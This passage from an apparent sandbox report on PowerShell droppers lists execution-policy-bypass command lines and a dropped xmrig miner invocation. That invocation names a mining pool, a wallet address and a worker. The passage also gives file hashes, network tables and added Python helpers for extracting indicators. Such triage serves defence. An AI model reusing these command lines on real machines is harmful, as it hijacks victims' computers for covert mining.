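        for ip, port, domain in t.suspicious_tcp:
            out.setdefault(domain or ip, set()).add(f"{ip}:{port}")
    return out


if __name__ == "__main__":
    merged = ioc_by_name([triage(parse_rows(t)) for t in SAMPLES.values()])
    for name, endpoints in sorted(merged.items()):
        print(f"{name:35} {', '.join(sorted(endpoints))}")
```

Block on the domain names where possible: the GitHub CDN address changed between runs while rx.unmineable.com stayed on one IP, and a connection with no recorded domain (52.111.236.23:443 in behavioral17) should be kept in the suspicious set until the analyst attributes it, not silently dropped.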

Files

memory/4260-0-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a32l4uce.iu4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4260-10-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/4260-9-0x00000153E8EE0000-0x00000153E8F02000-memory.dmp

memory/4260-11-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/4260-12-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/4260-14-0x00000153E90C0000-0x00000153E90D2000-memory.dmp

memory/4260-15-0x00000153E90B0000-0x00000153E90BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4256-46-0x000001F06AE00000-0x000001F06AE20000-memory.dmp

memory/4256-47-0x000001F06C570000-0x000001F06C590000-memory.dmp

memory/4256-48-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4260-49-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

memory/4260-50-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/4256-53-0x000001F06C5B0000-0x000001F06C5D0000-memory.dmp

memory/4256-52-0x000001F06C590000-0x000001F06C5B0000-memory.dmp

memory/4256-51-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4260-54-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/4256-55-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-56-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-57-0x000001F06C590000-0x000001F06C5B0000-memory.dmp

memory/4256-58-0x000001F06C5B0000-0x000001F06C5D0000-memory.dmp

memory/4256-59-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-60-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-61-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-62-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-63-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-64-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-65-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-66-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-67-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-68-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-69-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-70-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-71-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-72-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-73-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-74-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-75-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-76-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-77-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-78-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-79-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-80-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-81-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-82-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-83-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-84-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-85-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-86-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-87-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-88-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-89-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-90-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-91-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-92-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-93-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-94-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-95-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-96-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-97-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-98-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-99-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-100-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-101-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-102-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-103-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-104-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-105-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-106-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-107-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-108-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-109-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-110-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-111-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-112-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-113-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-114-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-115-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-116-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-117-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:41

Platform

win11-20240508-en

Max time kernel

1792s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(64 identical rows; no indicator, process or target was recorded for any match)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
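The two command lines above carry most of what an analyst needs from this run: a script launched with the execution policy set to Bypass, and a miner pointed at a TLS stratum endpoint with a wallet-plus-worker user string. The following Python helper is an added example, not part of the sandbox report and not code from xmrig or PowerShell; it pulls those fields out of command lines copied from a Processes section. The option table, the pool-scheme heuristic and the switch-matching rules are the author's assumptions, and the two sample command lines are constructed copies of the ones printed above.

```python
"""Extract indicators from the command lines a sandbox lists under
'Processes'. Added example; the option table and detection rules are the
author's assumptions, not part of the report or of xmrig/PowerShell."""
import shlex
from urllib.parse import urlsplit

# Constructed copies of the two command lines printed above.
SAMPLE_CMDLINES = [
    'powershell.exe -ExecutionPolicy bypass -File '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (9).ps1"',
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" -a rx '
    '-o stratum+ssl://rx.unmineable.com:443 '
    '-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
    '.unmineable_worker_vilqtiac -p x',
]

# Short and long spellings of the xmrig options worth pulling out.
XMRIG_OPTS = {
    "-a": "algo", "--algo": "algo",
    "-o": "url", "--url": "url",
    "-u": "user", "--user": "user",
    "-p": "pass", "--pass": "pass",
    "-t": "threads", "--threads": "threads",
}
# Execution policies that switch off script-signing checks for the session.
WEAK_POLICIES = {"bypass", "unrestricted"}


def split_windows_cmdline(cmdline):
    """Tokenise a Windows command line. posix=False stops shlex from eating
    backslashes and keeps quotes on the token, which are then stripped."""
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def parse_xmrig(tokens):
    """Pool, wallet and worker from an xmrig-style invocation."""
    opts = {}
    i = 1
    while i < len(tokens):
        key = XMRIG_OPTS.get(tokens[i].lower())
        if key is not None and i + 1 < len(tokens):
            opts[key] = tokens[i + 1]
            i += 2
        else:
            i += 1
    result = {"type": "xmrig", "image": tokens[0], "algo": opts.get("algo")}
    if "url" in opts:
        # stratum+ssl:// and stratum+tcp:// split like any other URL scheme.
        u = urlsplit(opts["url"])
        result.update(pool_scheme=u.scheme, pool_host=u.hostname,
                      pool_port=u.port, pool_tls=u.scheme.endswith("ssl"))
    if "user" in opts:
        # The -u value here is COIN:address.worker (unMineable's convention);
        # the worker name is a cheap pivot for clustering related samples.
        wallet, _, worker = opts["user"].partition(".")
        result.update(wallet=wallet, worker=worker or None)
    return result


def parse_powershell(tokens):
    """-ExecutionPolicy value and -File target. powershell.exe resolves switches
    by unambiguous prefix (-ex, -exec, ...) plus the explicit -ep alias, while
    a bare -e is -EncodedCommand, so require at least two letters."""
    result = {"type": "powershell", "image": tokens[0],
              "execution_policy": None, "script": None}
    for i in range(1, len(tokens) - 1):
        sw = tokens[i].lower()
        if not sw.startswith(("-", "/")):
            continue
        sw = sw[1:]
        if sw == "ep" or (len(sw) >= 2 and "executionpolicy".startswith(sw)):
            result["execution_policy"] = tokens[i + 1].lower()
        elif len(sw) >= 1 and "file".startswith(sw):
            result["script"] = tokens[i + 1]
    result["policy_weakened"] = result["execution_policy"] in WEAK_POLICIES
    return result


def triage_cmdline(cmdline):
    tokens = split_windows_cmdline(cmdline)
    image = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    stem = image[:-4] if image.endswith(".exe") else image
    if stem in ("powershell", "pwsh"):
        return parse_powershell(tokens)
    # Key on the option grammar, not just the file name: a renamed xmrig
    # still takes -o stratum+...://host:port -u <wallet>.
    if stem == "xmrig" or any(t.lower().startswith("stratum+") for t in tokens):
        return parse_xmrig(tokens)
    return {"type": "other", "image": tokens[0]}


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(triage_cmdline(cmd))
```

Two caveats when turning this into a detection. `-ExecutionPolicy Bypass` is a session setting, not a security boundary, so its presence is an indicator of intent rather than of a bypassed control; a `-File` target under `%TEMP%` together with a stratum pool URL in a child process is the stronger signal. The `SeLockMemoryPrivilege` rows under AdjustPrivilegeToken above are xmrig enabling large pages for RandomX and are normal for the miner, so they corroborate the command line rather than add a separate finding.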

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4804-0-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uwp0y5hg.low.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4804-3-0x000001B9F20D0000-0x000001B9F20F2000-memory.dmp

memory/4804-10-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4804-11-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4804-12-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4804-14-0x000001B9F2370000-0x000001B9F2382000-memory.dmp

memory/4804-15-0x000001B9F2110000-0x000001B9F211A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2248-46-0x000001986EBE0000-0x000001986EC00000-memory.dmp

memory/2248-47-0x0000019902C40000-0x0000019902C60000-memory.dmp

memory/2248-48-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/4804-49-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4804-50-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp

memory/2248-51-0x0000019903080000-0x00000199030A0000-memory.dmp

memory/2248-53-0x00000199032B0000-0x00000199032D0000-memory.dmp

memory/4804-52-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/2248-54-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-55-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-57-0x0000019903080000-0x00000199030A0000-memory.dmp

memory/2248-56-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-58-0x00000199032B0000-0x00000199032D0000-memory.dmp

memory/2248-59-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-60-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-61-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-62-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-63-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-64-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-65-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-66-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-67-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-68-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-69-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-70-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-71-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-72-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-73-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-74-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-75-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-76-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-77-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-78-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-79-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-80-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-81-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-82-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-83-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-84-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-85-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-86-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-87-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-88-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-89-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-90-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-91-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-92-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-93-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-94-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-95-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-96-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-97-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-98-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-99-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-100-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-101-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-102-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-103-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-104-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-105-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-106-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-107-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-108-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-109-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-110-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-111-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-112-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-113-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-114-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-115-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-116-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-117-0x00007FF701B60000-0x00007FF702793000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:15

Platform

win7-20240215-en

Max time kernel

1565s

Max time network

1567s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Network

N/A

Files

memory/2488-4-0x000007FEF5F6E000-0x000007FEF5F6F000-memory.dmp

memory/2488-6-0x0000000001E90000-0x0000000001E98000-memory.dmp

memory/2488-7-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

memory/2488-8-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

memory/2488-5-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2488-9-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

memory/2488-10-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

memory/2488-11-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

memory/2488-12-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:19

Platform

win7-20231129-en

Max time kernel

1556s

Max time network

1556s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Network

N/A

Files

memory/2340-4-0x000007FEF5E8E000-0x000007FEF5E8F000-memory.dmp

memory/2340-5-0x000000001B690000-0x000000001B972000-memory.dmp

memory/2340-6-0x0000000002860000-0x0000000002868000-memory.dmp

memory/2340-7-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

memory/2340-9-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

memory/2340-8-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

memory/2340-10-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

memory/2340-11-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

memory/2340-12-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:19

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1779s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(64 identical rows; no indicator, process or target was recorded for any match)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
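The Network table above mixes four kinds of rows: forward DNS queries to the sandbox resolver (8.8.8.8:53 udp), the sandbox's own reverse lookups (the in-addr.arpa names, which encode a destination IP with its octets reversed), the sample's actual connections (github.com for the download, rx.unmineable.com for the pool), and flows with no domain at all such as `NL 52.142.223.178:80 tcp`. The Python below is an added example, not part of the report, that sorts such a table into those buckets so that only the pool contact goes on a blocklist on sight; the pool-suffix list and resolver set are assumptions to adapt locally, and the embedded table is a constructed copy of part of the one above.

```python
"""Sort a sandbox 'Network' table into the sample's own contacts, resolver
traffic and background noise. Added example, not part of the report; the
pool-suffix list and resolver set are assumptions to adapt locally."""
import ipaddress

# Constructed copy of part of the Network table printed above.
NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
"""

MINING_POOL_SUFFIXES = ("unmineable.com",)   # assumed; extend from your own intel
RESOLVERS = {"8.8.8.8"}                      # the sandbox's upstream DNS


def parse_rows(table):
    """Rows have four columns, or three when no domain is tied to the flow."""
    rows = []
    for line in table.splitlines()[1:]:
        parts = line.split()
        if len(parts) == 3:
            country, dest, proto = parts
            domain = None
        else:
            country, dest, domain, proto = parts
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def ptr_to_ip(name):
    """'215.156.26.20.in-addr.arpa' -> '20.26.156.215'; None for other names."""
    if not name or not name.endswith(".in-addr.arpa"):
        return None
    octets = name[: -len(".in-addr.arpa")].split(".")
    return str(ipaddress.ip_address(".".join(reversed(octets))))


def is_pool_domain(domain):
    return any(domain == s or domain.endswith("." + s) for s in MINING_POOL_SUFFIXES)


def classify(rows):
    contacted = {}        # destination ip -> domains the sandbox tied to it
    ptr_queries = set()   # ips the sandbox reverse-resolved
    for r in rows:
        if r["ip"] in RESOLVERS and r["port"] == 53:
            ip = ptr_to_ip(r["domain"])
            if ip:
                ptr_queries.add(ip)
            continue   # forward lookups are implied by the tcp rows below
        contacted.setdefault(r["ip"], set())
        if r["domain"]:
            contacted[r["ip"]].add(r["domain"])
    return {
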